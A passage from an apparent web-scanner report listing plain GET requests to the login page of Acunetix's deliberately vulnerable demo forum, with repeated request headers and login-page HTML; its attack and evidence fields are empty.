style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=42 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=43 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=44 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=45 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=46 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=48 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=49 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
